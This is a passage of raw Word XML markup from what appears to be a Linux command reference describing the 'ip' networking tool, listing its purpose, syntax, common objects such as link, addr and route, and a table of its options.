          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve">command is the modern Linux networking tool that replaces older commands like </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>route</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>. It provides comprehensive network interface and routing management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C71B9A" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627AAF2F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:t>Configure and display network interfaces, IP addresses, routes, and network namespaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F842B" w14:textId="00172730" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E1892"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ip [OPTIONS] OBJECT COMMAND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152186A9" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4237D145" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>link</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Network devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72640FAB" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Protocol addresses on devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B9F787" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>route</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Routing table entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1059B8CF" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>neigh</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - ARP/neighbor cache entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D138A9B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>rule</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Routing policy database rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B938FE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>tunnel</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Tunnel over IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC5C90" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>maddr</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Multicast addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007D68E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>mroute</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Multicast routing cache entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BEE20D" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2757"/>
        <w:gridCol w:w="3156"/>
      </w:tblGrid>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="51BAB7D3" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40F2C5BE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C98ECA1" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="4676AF4C" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="032B039B" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-V, --version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2435FEA4" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Show version information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="60E715F8" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="522FDFA8" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-h, --help</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A42333" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Show help message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="5AF5717A" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C42BF03" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-s, --stats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47A6897E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Show statistics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="2CA31DB6" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="150F32D5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-d, --details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="031DE33C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Show detailed information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="58F000AC" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08B78958" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-r, --resolve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="041C9E42" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Resolve hostnames</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="754D4795" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A56B741" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>`-f, --family {inet\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BC0FA40" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>inet6\</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="22F70EF5" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30C01345" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53B00685" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>IPv4 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="7BF2FD7E" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B05A365" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="225A4417" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>IPv6 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="2493C505" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33F3D47E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-o, --oneline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2BBA38" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
